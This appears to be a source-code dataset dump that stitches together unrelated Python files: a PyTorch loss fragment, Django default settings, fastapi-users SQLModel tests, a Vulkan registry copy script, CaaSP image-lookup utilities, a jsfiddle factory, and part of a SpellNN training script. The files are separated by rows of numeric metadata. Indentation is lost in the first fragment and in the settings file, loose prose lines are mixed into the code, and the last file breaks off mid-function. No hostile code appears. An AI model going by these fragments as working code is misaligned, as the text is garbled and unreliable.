reward_loss = torch.zeros_like(transition_loss)
        # Negative loss
if self.neg:
z_n = tile(z_n, z_f)
batch_size = z_c.shape[0]
negative_loss = self.distance.negative_distance(z_n, z_f).sum()/batch_size
else:
negative_loss = torch.zeros_like(transition_loss)
return transition_loss, reward_loss, negative_loss
def tile(embedding, example):
    """Repeat each row of `embedding` so it lines up with `example`'s rows."""
n = example.shape[0]//embedding.shape[0]
embedding = embedding.unsqueeze(1).repeat(1, n, 1)
embedding = squeeze_embedding(embedding)
return embedding
def squeeze_embedding(x):
    """Flatten a (b, n, d) tensor to (b*n, d)."""
b, n, d = x.shape
x = x.reshape(b*n, d)
return x
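# --- Usage sketch (editor's addition): shapes are illustrative; it assumes the
# prae package (source of the distance helpers imported above) is installed.
if __name__ == '__main__':
    loss_fn = Loss(hinge=1.0)
    b, d = 8, 16
    z_c = torch.randn(b, d)      # current-state embeddings
    z_l = torch.randn(b, d)      # predicted next-state embeddings
    z_n = torch.randn(b, d)      # encoded next states
    z_f = torch.randn(b * 4, d)  # negative samples, four per example
    r, r_e = torch.randn(b), torch.randn(b)
    print(loss_fn(z_c, z_l, z_n, z_f, r, r_e))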
| 24.098361
| 86
| 0.586395
| 191
| 1,470
| 4.287958
| 0.314136
| 0.08547
| 0.014652
| 0.014652
| 0.078144
| 0.078144
| 0
| 0
| 0
| 0
| 0
| 0.007775
| 0.3
| 1,470
| 60
| 87
| 24.5
| 0.788144
| 0.065306
| 0
| 0.0625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.09375
| 0
| 0.34375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c6289a028d756ccd03ac220d11a9d33117ee573
| 6,530
|
py
|
Python
|
djcorsche/settings_default.py
|
carthage-college/django-djcorsche
|
c43db6e634f5b3fc9c8b0cff80ced8382ca6643c
|
[
"BSD-3-Clause"
] | null | null | null |
djcorsche/settings_default.py
|
carthage-college/django-djcorsche
|
c43db6e634f5b3fc9c8b0cff80ced8382ca6643c
|
[
"BSD-3-Clause"
] | null | null | null |
djcorsche/settings_default.py
|
carthage-college/django-djcorsche
|
c43db6e634f5b3fc9c8b0cff80ced8382ca6643c
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Django settings for project.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# Debug
#DEBUG = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
INFORMIX_DEBUG = "debug"
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
SECRET_KEY = ''
ALLOWED_HOSTS = []
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Chicago'
SITE_ID = 1
USE_I18N = False
USE_L10N = False
USE_TZ = False
DEFAULT_CHARSET = 'utf-8'
FILE_CHARSET = 'utf-8'
SERVER_URL = ""
API_URL = "%s/%s" % (SERVER_URL, "api")
LIVEWHALE_API_URL = "https://%s" % (SERVER_URL)
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
ROOT_DIR = os.path.dirname(__file__)
ROOT_URL = "/djskeletor/"
ROOT_URLCONF = 'djskeletor.core.urls'
WSGI_APPLICATION = 'djskeletor.wsgi.application'
MEDIA_ROOT = ''
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATIC_ROOT = ''
STATIC_URL = "/static/"
STATICFILES_DIRS = ()
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
DATABASES = {
'default': {
'HOST': '127.0.0.1',
'PORT': '3306',
'NAME': 'django_djskeletor',
'ENGINE': 'django.db.backends.mysql',
#'ENGINE': 'django.db.backends.dummy',
'USER': '',
'PASSWORD': ''
},
}
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.formtools',
'django.contrib.humanize',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'djskeletor',
'djskeletor.core',
'djskeletor.myapp',
'djtools',
)
MIDDLEWARE_CLASSES = (
'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.cache.FetchFromCacheMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# the following should be uncommented unless you are
# embedding your apps in iframes
#'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# template stuff
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_DIRS = (
"/data2/django_projects/djskeletor/templates/",
"/data2/django_templates/djkorra/",
"/data2/django_templates/djcher/",
"/data2/django_templates/",
)
TEMPLATE_CONTEXT_PROCESSORS = (
"djtools.context_processors.sitevars",
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
"django.core.context_processors.media",
)
# caching
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
#'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#'LOCATION': '127.0.0.1:11211',
#'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
#'LOCATION': '/var/tmp/django_djskeletor_cache',
#'TIMEOUT': 60*20,
#'KEY_PREFIX': "DJSKELETOR_",
#'OPTIONS': {
# 'MAX_ENTRIES': 80000,
#}
}
}
CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True
# LDAP Constants
LDAP_SERVER = ''
LDAP_SERVER_PWM = ''
LDAP_PORT = ''
LDAP_PORT_PWM = ''
LDAP_PROTOCOL = ""
LDAP_PROTOCOL_PWM = ""
LDAP_BASE = ""
LDAP_USER = ""
LDAP_PASS = ""
LDAP_EMAIL_DOMAIN = ""
LDAP_OBJECT_CLASS = ""
LDAP_OBJECT_CLASS_LIST = []
LDAP_GROUPS = {}
LDAP_RETURN = []
LDAP_RETURN_PWM = []
LDAP_ID_ATTR = ""
LDAP_CHALLENGE_ATTR = ""
# auth backends
AUTHENTICATION_BACKENDS = (
'djauth.ldapBackend.LDAPBackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_URL = '/djskeletor/accounts/login/'
LOGIN_REDIRECT_URL = '/djskeletor/'
USE_X_FORWARDED_HOST = True
#SESSION_ENGINE = "django.contrib.sessions.backends.cache"
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
SESSION_COOKIE_DOMAIN=".carthage.edu"
SESSION_COOKIE_NAME ='django_djskeletor_cookie'
SESSION_COOKIE_AGE = 86400
# SMTP settings
EMAIL_HOST = ''
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_FAIL_SILENTLY = False
DEFAULT_FROM_EMAIL = ''
SERVER_EMAIL = ''
SERVER_MAIL = ''
# logging
LOG_FILEPATH = os.path.join(os.path.dirname(__file__), "logs/")
LOG_FILENAME = LOG_FILEPATH + "debug.log"
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'standard': {
'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'null': {
'level':'DEBUG',
'class':'django.utils.log.NullHandler',
},
'logfile': {
'level':'DEBUG',
'class':'logging.handlers.RotatingFileHandler',
'filename': LOG_FILENAME,
'maxBytes': 50000,
'backupCount': 2,
'formatter': 'standard',
},
'console':{
'level':'INFO',
'class':'logging.StreamHandler',
'formatter': 'standard'
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'include_html': True,
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'djskeletor': {
'handlers':['logfile'],
'propagate': True,
'level':'DEBUG',
},
'django': {
'handlers':['console'],
'propagate': True,
'level':'WARN',
},
'django.db.backends': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
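A downstream project would typically import these defaults wholesale and then override the deployment-specific values; a sketch (the override values shown are placeholders, not real settings):
from djcorsche.settings_default import *

DEBUG = False
SECRET_KEY = 'change-me'
ALLOWED_HOSTS = ['example.carthage.edu']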
| 27.552743
| 96
| 0.620214
| 653
| 6,530
| 5.984686
| 0.381317
| 0.059877
| 0.013306
| 0.01305
| 0.07216
| 0.038383
| 0.010747
| 0.010747
| 0.010747
| 0
| 0
| 0.011021
| 0.221899
| 6,530
| 236
| 97
| 27.669492
| 0.758118
| 0.118989
| 0
| 0.084577
| 0
| 0.00995
| 0.426075
| 0.252884
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.014925
| 0.004975
| 0
| 0.004975
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c63d036bfd0e51ade860a3521aecee117e88f7d
| 7,064
|
py
|
Python
|
tests/test_users.py
|
fastapi-users/fastapi-users-db-sqlmodel
|
3a46b80399f129aa07a834a1b40bf49d08c37be1
|
[
"MIT"
] | 18
|
2021-09-09T09:35:30.000Z
|
2022-03-19T04:58:17.000Z
|
tests/test_users.py
|
fastapi-users/fastapi-users-db-sqlmodel
|
3a46b80399f129aa07a834a1b40bf49d08c37be1
|
[
"MIT"
] | null | null | null |
tests/test_users.py
|
fastapi-users/fastapi-users-db-sqlmodel
|
3a46b80399f129aa07a834a1b40bf49d08c37be1
|
[
"MIT"
] | 3
|
2021-11-01T16:58:54.000Z
|
2022-02-15T16:17:11.000Z
|
import uuid
from typing import AsyncGenerator
import pytest
from sqlalchemy import exc
from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine
from sqlalchemy.orm import sessionmaker
from sqlmodel import Session, SQLModel, create_engine
from fastapi_users_db_sqlmodel import (
NotSetOAuthAccountTableError,
SQLModelUserDatabase,
SQLModelUserDatabaseAsync,
)
from tests.conftest import OAuthAccount, UserDB, UserDBOAuth
safe_uuid = uuid.UUID("a9089e5d-2642-406d-a7c0-cbc641aca0ec")
async def init_sync_session(url: str) -> AsyncGenerator[Session, None]:
engine = create_engine(url, connect_args={"check_same_thread": False})
SQLModel.metadata.create_all(engine)
with Session(engine) as session:
yield session
SQLModel.metadata.drop_all(engine)
async def init_async_session(url: str) -> AsyncGenerator[AsyncSession, None]:
engine = create_async_engine(url, connect_args={"check_same_thread": False})
make_session = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False)
async with engine.begin() as conn:
await conn.run_sync(SQLModel.metadata.create_all)
async with make_session() as session:
yield session
await conn.run_sync(SQLModel.metadata.drop_all)
@pytest.fixture(
params=[
(init_sync_session, "sqlite:///./test-sqlmodel-user.db", SQLModelUserDatabase),
(
init_async_session,
"sqlite+aiosqlite:///./test-sqlmodel-user.db",
SQLModelUserDatabaseAsync,
),
],
ids=["sync", "async"],
)
async def sqlmodel_user_db(request) -> AsyncGenerator[SQLModelUserDatabase, None]:
create_session = request.param[0]
database_url = request.param[1]
database_class = request.param[2]
async for session in create_session(database_url):
yield database_class(UserDB, session)
@pytest.fixture(
params=[
(
init_sync_session,
"sqlite:///./test-sqlmodel-user-oauth.db",
SQLModelUserDatabase,
),
(
init_async_session,
"sqlite+aiosqlite:///./test-sqlmodel-user-oauth.db",
SQLModelUserDatabaseAsync,
),
],
ids=["sync", "async"],
)
async def sqlmodel_user_db_oauth(request) -> AsyncGenerator[SQLModelUserDatabase, None]:
create_session = request.param[0]
database_url = request.param[1]
database_class = request.param[2]
async for session in create_session(database_url):
yield database_class(UserDBOAuth, session, OAuthAccount)
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries(sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]):
user = UserDB(
id=safe_uuid,
email="lancelot@camelot.bt",
hashed_password="guinevere",
)
# Create
user_db = await sqlmodel_user_db.create(user)
assert user_db.id is not None
assert user_db.is_active is True
assert user_db.is_superuser is False
assert user_db.email == user.email
# Update
user_db.is_superuser = True
await sqlmodel_user_db.update(user_db)
# Get by id
id_user = await sqlmodel_user_db.get(user.id)
assert id_user is not None
assert id_user.id == user_db.id
assert id_user.is_superuser is True
# Get by email
email_user = await sqlmodel_user_db.get_by_email(str(user.email))
assert email_user is not None
assert email_user.id == user_db.id
# Get by uppercased email
email_user = await sqlmodel_user_db.get_by_email("Lancelot@camelot.bt")
assert email_user is not None
assert email_user.id == user_db.id
# Unknown user
unknown_user = await sqlmodel_user_db.get_by_email("galahad@camelot.bt")
assert unknown_user is None
# Delete user
await sqlmodel_user_db.delete(user)
deleted_user = await sqlmodel_user_db.get(user.id)
assert deleted_user is None
# Exception when trying to get by OAuth account
with pytest.raises(NotSetOAuthAccountTableError):
await sqlmodel_user_db.get_by_oauth_account("foo", "bar")
@pytest.mark.asyncio
@pytest.mark.db
async def test_insert_existing_email(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]
):
user = UserDB(
id=safe_uuid,
email="lancelot@camelot.bt",
hashed_password="guinevere",
)
await sqlmodel_user_db.create(user)
with pytest.raises(exc.IntegrityError):
await sqlmodel_user_db.create(
UserDB(id=safe_uuid, email=user.email, hashed_password="guinevere")
)
@pytest.mark.asyncio
@pytest.mark.db
async def test_insert_non_nullable_fields(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]
):
with pytest.raises(exc.IntegrityError):
wrong_user = UserDB(
id=safe_uuid, email="lancelot@camelot.bt", hashed_password="aaa"
)
wrong_user.email = None # type: ignore
await sqlmodel_user_db.create(wrong_user)
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries_custom_fields(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount],
):
"""It should output custom fields in query result."""
user = UserDB(
id=safe_uuid,
email="lancelot@camelot.bt",
hashed_password="guinevere",
first_name="Lancelot",
)
await sqlmodel_user_db.create(user)
id_user = await sqlmodel_user_db.get(user.id)
assert id_user is not None
assert id_user.id == user.id
assert id_user.first_name == user.first_name
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries_oauth(
sqlmodel_user_db_oauth: SQLModelUserDatabase[UserDBOAuth, OAuthAccount],
oauth_account1,
oauth_account2,
):
user = UserDBOAuth(
id=safe_uuid,
email="lancelot@camelot.bt",
hashed_password="guinevere",
oauth_accounts=[oauth_account1, oauth_account2],
)
# Create
user_db = await sqlmodel_user_db_oauth.create(user)
assert user_db.id is not None
assert hasattr(user_db, "oauth_accounts")
assert len(user_db.oauth_accounts) == 2
# Update
user_db.oauth_accounts[0].access_token = "NEW_TOKEN"
await sqlmodel_user_db_oauth.update(user_db)
# Get by id
id_user = await sqlmodel_user_db_oauth.get(user.id)
assert id_user is not None
assert id_user.id == user_db.id
assert id_user.oauth_accounts[0].access_token == "NEW_TOKEN"
# Get by email
email_user = await sqlmodel_user_db_oauth.get_by_email(str(user.email))
assert email_user is not None
assert email_user.id == user_db.id
assert len(email_user.oauth_accounts) == 2
# Get by OAuth account
oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account(
oauth_account1.oauth_name, oauth_account1.account_id
)
assert oauth_user is not None
assert oauth_user.id == user.id
assert len(oauth_user.oauth_accounts) == 2
# Unknown OAuth account
unknown_oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account("foo", "bar")
assert unknown_oauth_user is None
| 30.982456
| 88
| 0.709513
| 920
| 7,064
| 5.191304
| 0.147826
| 0.059045
| 0.085008
| 0.079564
| 0.630653
| 0.573283
| 0.536432
| 0.484296
| 0.45959
| 0.44263
| 0
| 0.006196
| 0.200311
| 7,064
| 227
| 89
| 31.118943
| 0.839264
| 0.03171
| 0
| 0.445714
| 0
| 0
| 0.071481
| 0.029538
| 0
| 0
| 0
| 0
| 0.165714
| 1
| 0
| false
| 0.034286
| 0.051429
| 0
| 0.051429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c64a40785307d838c76dd7877d9296fa9590e81
| 623
|
py
|
Python
|
copy_reg.py
|
rtbo/vkdgen
|
04a228961bb091b59dc6f741eee703cd81724ca3
|
[
"MIT"
] | 2
|
2021-01-08T15:05:27.000Z
|
2021-10-12T08:44:01.000Z
|
copy_reg.py
|
rtbo/vkdgen
|
04a228961bb091b59dc6f741eee703cd81724ca3
|
[
"MIT"
] | null | null | null |
copy_reg.py
|
rtbo/vkdgen
|
04a228961bb091b59dc6f741eee703cd81724ca3
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
import os
from os import path
root_dir = path.dirname(path.realpath(__file__))
local_reg_dir = path.join(root_dir, 'registry')
os.makedirs(local_reg_dir, exist_ok=True)
def copy_reg(reg_dir, files):
import shutil
for f in files:
file_path = path.join(reg_dir, f)
if not path.isfile(file_path):
raise RuntimeError(file_path + ' could not be found')
shutil.copy2(file_path, path.join(local_reg_dir, path.basename(f)))
vk_files = [ 'registry/vk.xml', 'registry/reg.py', 'registry/generator.py' ]
copy_reg(path.join(root_dir, 'Vulkan-Headers'), vk_files)
| 31.15
| 76
| 0.704655
| 99
| 623
| 4.191919
| 0.444444
| 0.072289
| 0.079518
| 0.072289
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003846
| 0.165329
| 623
| 19
| 77
| 32.789474
| 0.794231
| 0.035313
| 0
| 0
| 0
| 0
| 0.153333
| 0.035
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.214286
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c656802f3785c807e752895a2d07dd94b79c82b
| 4,377
|
py
|
Python
|
cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py
|
hwoarang/caasp-container-manifests
|
6df831d6b4f4218f96e552c416d86eabcfad46c0
|
[
"Apache-2.0"
] | 5
|
2017-03-16T10:47:39.000Z
|
2018-01-17T13:07:03.000Z
|
cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py
|
hwoarang/caasp-container-manifests
|
6df831d6b4f4218f96e552c416d86eabcfad46c0
|
[
"Apache-2.0"
] | 138
|
2017-03-08T12:43:51.000Z
|
2019-04-15T12:57:30.000Z
|
cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py
|
hwoarang/caasp-container-manifests
|
6df831d6b4f4218f96e552c416d86eabcfad46c0
|
[
"Apache-2.0"
] | 26
|
2017-03-09T08:24:03.000Z
|
2019-03-08T00:26:52.000Z
|
import json
import logging
import re
import susepubliccloudinfoclient.infoserverrequests as ifsrequest
import yaml
import sys
RELEASE_DATE = re.compile(r'^.*-v(\d{8})-*.*')
def get_caasp_release_version():
"""Return the version from os-release"""
os_release = open('/etc/os-release', 'r').readlines()
for entry in os_release:
if entry.startswith('VERSION_ID'):
version_id = entry.split('=')[-1].strip()
# We assume that os-release will always have '"' as
# version delimiters
version = version_id.strip('"\'')
logging.info('Release version: "%s"' % version)
return version
def get_cloud_config_path():
"""Return the path for the cloud configuration file"""
return '/etc/salt/pillar/cloud.sls'
def get_from_config(config_option):
"""Get the value for the given config option"""
    # This method is expected to see low usage, so re-read the file on an
    # as-needed basis. If this turns out to be an issue, cache the content.
config_path = get_cloud_config_path()
with open(config_path) as config_file:
        config = yaml.safe_load(config_file.read())
settings = config.get('cloud')
if not settings:
return
return settings.get(config_option)
def get_cluster_image_identifier(framework, region):
"""Return the identifier for the latest cluster node image"""
cluster_image = get_from_config('cluster_image')
if cluster_image:
# The data returned in this code path has built in knowledge
# about the information consumed by the client from the
# full pint data
image_data = {}
image_data['id'] = cluster_image
image_data['name'] = cluster_image
if framework == 'microsoft' and cluster_image.count(':') == 3:
image_data['urn'] = cluster_image
msg = 'Using cluster image from configuration. '
msg += 'Image data for cluster node image: "%s"'
logging.info(msg % image_data)
return image_data
name_filter = 'name~caasp,name~cluster'
flavor = get_from_config('procurement_flavor')
if flavor == 'byos':
name_filter += ',name~byos'
else:
name_filter += ',name!byos'
version = get_caasp_release_version()
name_filter += ',name~' + version.replace('.', '-')
# The cluster image we choose depends on the admin node version,
# thus we cannot just query for active images. We need to get all
# images and then process accordingly.
try:
image_info = ifsrequest.get_image_data(
framework,
None,
'json',
region,
name_filter
)
except Exception as e:
        logging.error('Pint server access failed: "%s"' % e)
# This message will bubble up through salt
return 'See /var/log/caasp_cloud_setup.log'
try:
image_data = json.loads(image_info)
available_images = image_data.get('images', [])
target_image = None
target_image_date = 0
for image in available_images:
image_name = image.get('name')
try:
date = int(RELEASE_DATE.match(image_name).group(1))
if date > target_image_date:
                    # If multiple images matching our filter criteria share
                    # the same date, we have a serious data problem we cannot
                    # really recover from; the first one wins
target_image = image
except Exception:
                # Image name has no date stamp; skip it
continue
except Exception as e:
        logging.error('Could not load json data from pint: "%s"' % e)
# This message will bubble up through salt
return 'See /var/log/caasp_cloud_setup.log'
if not target_image:
logging.error('Could not determine image identifier for cluster node.')
logging.error('This implies that the pint server is unreachable or the '
'data is incomplete, please report the issue, exiting.')
sys.exit('pint lookup failed')
logging.info('Image data for cluster node image: "%s"' % target_image)
return target_image
def load_platform_module(platform_name):
mod = __import__('caaspadminsetup.%s' % platform_name, fromlist=[''])
return mod
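A hedged example of how the lookup above might be driven; the framework and region values are illustrative, and a real run needs /etc/os-release, the cloud config pillar, and a reachable pint server:
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    image = get_cluster_image_identifier('amazon', 'us-east-1')
    print(image)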
| 37.732759
| 80
| 0.631026
| 557
| 4,377
| 4.807899
| 0.332136
| 0.036968
| 0.020911
| 0.01643
| 0.100822
| 0.100822
| 0.078417
| 0.056759
| 0.056759
| 0.056759
| 0
| 0.00158
| 0.276902
| 4,377
| 115
| 81
| 38.06087
| 0.84455
| 0.215216
| 0
| 0.085366
| 0
| 0
| 0.197705
| 0.032068
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060976
| false
| 0
| 0.085366
| 0
| 0.243902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c6cd0ca287f397e656cbb934079a5d03bb867b9
| 2,786
|
py
|
Python
|
jsfiddle_factory/__init__.py
|
andrewp-as-is/jsfiddle-factory.py
|
7b8b883676f3330f5714b15157819b583a753ba1
|
[
"Unlicense"
] | null | null | null |
jsfiddle_factory/__init__.py
|
andrewp-as-is/jsfiddle-factory.py
|
7b8b883676f3330f5714b15157819b583a753ba1
|
[
"Unlicense"
] | null | null | null |
jsfiddle_factory/__init__.py
|
andrewp-as-is/jsfiddle-factory.py
|
7b8b883676f3330f5714b15157819b583a753ba1
|
[
"Unlicense"
] | null | null | null |
__all__ = ['Factory']
import jsfiddle_build
import jsfiddle_github
import jsfiddle_generator
import jsfiddle_readme_generator
import getdirs
import getfiles
import os
import popd
import yaml
@popd.popd
def _build(path):
os.chdir(path)
jsfiddle_build.Build().save("build.html")
@popd.popd
def _init(path):
os.chdir(path)
isempty = len(os.listdir(path)) == 0
isfiddle = len(
list(filter(os.path.exists, ["demo.css", "demo.js", "demo.html"]))) > 0
if isempty or isfiddle:
jsfiddle_generator.JSFiddleRepo().create()
@popd.popd
def _readme(path):
os.chdir(path)
jsfiddle_readme_generator.Readme().save("README.md")
class Factory:
"""attrs: `path`. methods: `detox()`, `init()`, `build()`, `readme()`, `update_resources()`"""
path = None
def __init__(self, path=None):
if not path:
path = os.getcwd()
self.path = path
def build_html(self):
files = getfiles.getfiles(self.path)
matches = ["demo.html", "fiddle.html"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
_build(os.path.dirname(f))
def create_readme(self):
files = getfiles.getfiles(self.path)
matches = ["demo.html", "fiddle.html"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
_readme(os.path.dirname(f))
def init(self):
for path in getdirs.getdirs(self.path):
_init(path)
def detox(self):
renamed = True
while renamed:
renamed = False
for path in getdirs.getdirs(self.path):
relpath = os.path.relpath(path, os.getcwd())
new_relpath = jsfiddle_github.sanitize(relpath)
new_path = os.path.join(os.getcwd(), new_relpath)
ishidden = relpath[0] == "." and "%s." % os.sep not in relpath
if not ishidden and new_relpath != relpath:
os.rename(path, new_path)
print("%s -> %s" % (path, new_path))
renamed = True
break
def update_resources(self):
f = os.path.join(self.path, "resources.txt")
        if not os.path.exists(f):
            print("SKIP: %s NOT EXISTS" % f)
            return
        resources = list(filter(None, open(f).read().splitlines()))
files = getfiles.getfiles(self.path)
matches = ["demo.details", "fiddle.manifest"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
if os.path.exists(f):
                data = yaml.safe_load(open(f, 'r'))
if data.get("resources", []) != resources:
data["resources"] = resources
yaml.dump(data, open(f, 'w'), default_flow_style=False)
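A minimal driver for the Factory class above, run from a repository root (the path argument defaults to the current working directory):
factory = Factory()
factory.detox()             # sanitize directory names for jsfiddle/GitHub
factory.init()              # scaffold empty or fiddle-like directories
factory.build_html()        # write build.html next to each demo/fiddle page
factory.create_readme()     # regenerate README.md files
factory.update_resources()  # sync resources.txt into details/manifest files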
| 30.955556
| 98
| 0.578248
| 346
| 2,786
| 4.552023
| 0.245665
| 0.041905
| 0.017778
| 0.028571
| 0.280635
| 0.229841
| 0.229841
| 0.165079
| 0.165079
| 0.165079
| 0
| 0.001505
| 0.284637
| 2,786
| 89
| 99
| 31.303371
| 0.788761
| 0.031587
| 0
| 0.25
| 0
| 0
| 0.067236
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.125
| 0
| 0.277778
| 0.027778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c6d7d5083c40236ec67c12d5db46eb9b81e4185
| 5,774
|
py
|
Python
|
spellnn/train.py
|
MartinXPN/SpellNN
|
e3226fbff359ef60360e63bf7b80a7e1c909e7d8
|
[
"MIT"
] | null | null | null |
spellnn/train.py
|
MartinXPN/SpellNN
|
e3226fbff359ef60360e63bf7b80a7e1c909e7d8
|
[
"MIT"
] | null | null | null |
spellnn/train.py
|
MartinXPN/SpellNN
|
e3226fbff359ef60360e63bf7b80a7e1c909e7d8
|
[
"MIT"
] | null | null | null |
import logging
import os
from datetime import datetime
from inspect import signature, Parameter
from pathlib import Path
from pprint import pprint
from textwrap import dedent
from typing import Optional, Union
import fire
import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN
from tensorflow.keras import Model
from spellnn import models
from spellnn.data import alphabet
from spellnn.data.alphabet import get_chars
from spellnn.data.processing import DataProcessor
from spellnn.data.util import nb_lines
from spellnn.layers.mapping import CharMapping
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # FATAL
logging.getLogger('tensorflow').setLevel(logging.FATAL)
class Gym:
def __init__(self):
self.train_dataset: Optional[tf.data.Dataset] = None
self.valid_dataset: Optional[tf.data.Dataset] = None
self.char2int: Optional[CharMapping] = None
self.model: Optional[Model] = None
self.nb_train_samples: int = 0
self.nb_valid_samples: int = 0
self.batch_size = 0
def construct_dataset(self, path: str, locale: str, batch_size: int = 32, validation_split: float = 0.3):
pprint(locals())
all_chars = [alphabet.START, alphabet.END] + get_chars(locale)
char_weights = [0.5 if c.isalpha() and c.islower() else
0.2 if c.isalpha() else
0.1 if c not in {alphabet.START, alphabet.END} else
0 for c in all_chars]
self.char2int = CharMapping(chars=all_chars, include_unknown=True)
data_processor = DataProcessor(locale=locale, char2id=self.char2int,
alphabet=all_chars, alphabet_weighs=char_weights)
print('Calculating number of lines in the file...', end=' ')
all_samples = nb_lines(path)
print(all_samples)
self.batch_size = batch_size
self.nb_train_samples = int((1 - validation_split) * all_samples)
self.nb_valid_samples = all_samples - self.nb_train_samples
dataset = tf.data.TextLineDataset(path)
